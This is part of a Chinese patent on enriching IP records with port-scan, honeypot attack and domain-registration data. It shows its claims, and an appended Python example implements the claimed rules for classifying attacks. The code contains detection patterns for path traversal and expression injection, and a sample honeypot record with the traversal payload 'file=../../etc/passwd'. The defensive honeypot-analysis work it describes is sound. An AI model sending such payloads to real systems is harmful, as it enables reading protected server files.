It should be noted that the functions, if implemented in the form of software functional modules and sold or used as independent products, may be stored in a computer readable storage medium. Based on such understanding, the technical solutions of the present application, or the portions thereof that substantially contribute to the prior art, may be embodied in the form of a software product, which is stored in a storage medium and includes several instructions for causing a computer device (which may be a personal computer, a server, or a network device) to execute all or part of the steps of the methods according to the embodiments of the present application. The aforementioned storage medium includes various media capable of storing program code, such as a USB disk, a removable hard disk, a Read-Only Memory (ROM), a Random Access Memory (RAM), a magnetic disk, or an optical disk.
In this document, relational terms such as first and second, and the like may be used solely to distinguish one entity or action from another entity or action without necessarily requiring or implying any actual such relationship or order between such entities or actions.
The above embodiments are merely examples of the present application and are not intended to limit the scope of the present application, and various modifications and changes may be made by those skilled in the art. Any modification, equivalent replacement, or improvement made within the spirit and principle of the present application shall be included in the protection scope of the present application.

Claims (12)

1. An IP information processing method, characterized in that the method comprises:
acquiring IP port service information data, IP attack information data and IP basic information data, wherein the IP port service information data is acquired by a network space detection system, and the IP attack information data is acquired by an Internet honeypot system;
analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information.
2. The method of claim 1, wherein the IP attack information data comprises: a source IP of an attacker, a source port of the attacker, an HTTP request method of the attacker, a target service type attacked by the attacker, a target port attacked by the attacker, a user agent of the HTTP request of the attacker, a URL address requested by the attacker, and a value of a POST packet sent by the attacker;
and, the IP port service information data includes: the open port of the target IP, the details of the response packet, the service name and the version information;
and the IP basic information data comprises the geographic position of the target IP, the domain name resolved by the target IP, a domain name registrant of the domain name resolved by the target IP and a mailbox of the domain name resolved by the target IP.
3. The method of claim 2, wherein after obtaining the IP port service information data, the IP attack information data and the IP basic information data, and before analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information, the method further comprises:
associating and storing the IP port service information data, the IP attack information data and the IP basic information data through a unique IP address.
4. The method of claim 3, wherein analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information comprises:
matching URL addresses based on the value of the POST packet sent by the attacker, and obtaining a first URL address set;
filtering normal websites in the first URL address set based on a white list to obtain a second URL address set;
downloading a file associated with each URL address in the second URL address set;
and scanning the file associated with each URL address with an antivirus engine, wherein if the scanning result indicates that the file associated with the URL address is a malicious file, the URL address is stored in a Trojan download address field of the current IP address, and the hash value of the malicious file and the scanning result are stored in a sample set.
5. The method of claim 3, wherein analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information comprises:
and comparing the value of the POST packet sent by the attacker with a preset vulnerability characteristic, if the value of the POST packet sent by the attacker hits the preset vulnerability characteristic, marking the vulnerability type of the current IP address, and determining that the penetration attack exists in the current IP address.
6. The method of claim 3, wherein analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information comprises:
judging whether the HTTP request method of the attacker is GET or not, and comparing the IP attack information data with the vulnerability characteristics;
and when the HTTP request method of the attacker is GET and the comparison result indicates that the IP attack information data does not contain the vulnerability character features, determining that a scanning attack exists for the current IP address.
7. The method of claim 3, wherein analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information comprises:
judging whether the HTTP requests of the attacker use more than 5 UserAgents, and if so, determining that the attacker carries out an automatic scanning attack with hiding capability;
and judging whether the UserAgent of the HTTP request of the attacker has botnet character characteristics or not, and if so, performing botnet family marking on the current IP address.
8. The method of claim 3, wherein analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information comprises:
judging whether the open port of the target IP is a 22 port or not, and if so, determining that the current IP address is the IP address of the linux server;
and judging whether the open port of the target IP is a 3389 port or not, and if so, determining that the current IP address is the IP address of the windows server.
9. The method of claim 3, wherein analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information comprises:
judging whether the domain name resolved by the target IP, the domain name registrant of the domain name resolved by the target IP and the mailbox of the domain name resolved by the target IP have data, if so, storing the domain name resolved by the target IP, the domain name registrant of the domain name resolved by the target IP and the mailbox of the domain name resolved by the target IP.
10. An IP information processing apparatus, characterized in that the apparatus comprises:
an acquisition module, configured to acquire IP port service information data, IP attack information data and IP basic information data, wherein the IP port service information data is acquired by a network space detection system, and the IP attack information data is acquired by an Internet honeypot system;
and an analysis module, configured to analyze the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information.
11. An electronic device, comprising:
a processor; and
a memory configured to store machine readable instructions that, when executed by the processor, perform the IP information processing method of any one of claims 1-7.
12. A storage medium characterized in that the storage medium stores a computer program which is executed by a processor to execute the IP information processing method according to any one of claims 1 to 7.
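The context-generation rules of claims 3 and 5 to 9 (the same port 22/3389 and domain-name steps described in the embodiments above), worked as one added Python example that is not code from the patent or its assignee. The record field names (src_ip, user_agent, post_body), the vulnerability and botnet signatures, and the sample records are assumptions or constructed for the example; honeypot records are keyed by the attacker's source IP, survey and basic records by the target IP.

```python
import re
from dataclasses import dataclass, field

# Constructed stand-ins for the patent's preset vulnerability/botnet features; a real deployment loads its own rule set.
VULN_FEATURES = {"path-traversal": re.compile(r"\.\./\.\./"),
                 "expression-injection": re.compile(r"\$\{[^}]+\}")}
BOTNET_UA_FEATURES = {"example-family": "ExampleBot/1.0"}  # family -> UserAgent marker
UA_HIDING_THRESHOLD = 5  # claim 7: more than 5 UserAgents => automated scanning with hiding

@dataclass
class IPContext:
    ip: str
    attack_types: set = field(default_factory=set)
    vuln_types: set = field(default_factory=set)
    botnet_families: set = field(default_factory=set)
    os_guess: str = ""
    domain: dict = field(default_factory=dict)

def associate_by_ip(attacks, ports, basics):  # claim 3: join the sources on the unique IP
    # Honeypot records carry the attacker's source IP; survey and basic records the target IP.
    joined = {}
    for key, recs, bucket in (("src_ip", attacks, "attacks"), ("ip", ports, "ports")):
        for rec in recs:
            joined.setdefault(rec[key], {"attacks": [], "ports": [], "basic": {}})[bucket].append(rec)
    for rec in basics:
        joined.setdefault(rec["ip"], {"attacks": [], "ports": [], "basic": {}})["basic"] = rec
    return joined

def analyze(ip, slot):
    """Claims 5-9: derive the IP context from the joined records of one IP."""
    ctx, user_agents = IPContext(ip), set()
    for a in slot["attacks"]:
        ua = a.get("user_agent", "")
        user_agents.add(ua)
        payload = a.get("post_body", "") + " " + a.get("url", "")
        hits = {name for name, pat in VULN_FEATURES.items() if pat.search(payload)}
        if hits:  # claim 5 covers POST bodies; GET hits are treated the same (assumption)
            ctx.attack_types.add("penetration")
            ctx.vuln_types |= hits
        elif a.get("method") == "GET":  # claim 6: GET without vulnerability features
            ctx.attack_types.add("scanning")
        ctx.botnet_families |= {f for f, mark in BOTNET_UA_FEATURES.items() if mark in ua}
    if len(user_agents) > UA_HIDING_THRESHOLD:
        ctx.attack_types.add("automated-scanning-with-hiding")
    open_ports = {p["port"] for p in slot["ports"]}  # claim 8: port-based OS guess
    if 22 in open_ports:
        ctx.os_guess = "linux"
    if 3389 in open_ports:  # both open: the heuristic cannot decide, record that
        ctx.os_guess = "windows" if not ctx.os_guess else "ambiguous"
    for key in ("domain", "registrant", "mailbox"):  # claim 9: store only when present
        if slot["basic"].get(key):
            ctx.domain[key] = slot["basic"][key]
    return ctx

def build_contexts(attacks, ports, basics):
    return {ip: analyze(ip, s) for ip, s in associate_by_ip(attacks, ports, basics).items()}

# Constructed sample records (TEST-NET addresses, not real observations).
SAMPLE_ATTACKS = [{"src_ip": "198.51.100.7", "method": "POST", "url": "/login",
                   "user_agent": "ExampleBot/1.0", "post_body": "file=../../etc/passwd"}] + [
                  {"src_ip": "198.51.100.7", "method": "GET", "url": f"/probe{i}",
                   "user_agent": f"Scanner-{i}", "post_body": ""} for i in range(6)]
SAMPLE_PORTS = [{"ip": "198.51.100.7", "port": 22}]
SAMPLE_BASIC = [{"ip": "198.51.100.7", "domain": "example.net",
                 "registrant": "Example Registrant", "mailbox": ""}]
```

`build_contexts(SAMPLE_ATTACKS, SAMPLE_PORTS, SAMPLE_BASIC)` yields one context for 198.51.100.7 marked penetration, scanning and automated scanning with hiding, vulnerability type path-traversal, botnet family example-family, a Linux OS guess, and only the non-empty domain fields stored.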
CN202310114335.5A 2023-02-15 2023-02-15 IP information processing method, device, electronic equipment and storage medium Active CN115883258B (en)
Publications (2)

Publication Number Publication Date
CN115883258A true CN115883258A (en) 2023-03-31
CN115883258B CN115883258B (en) 2023-08-01
Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant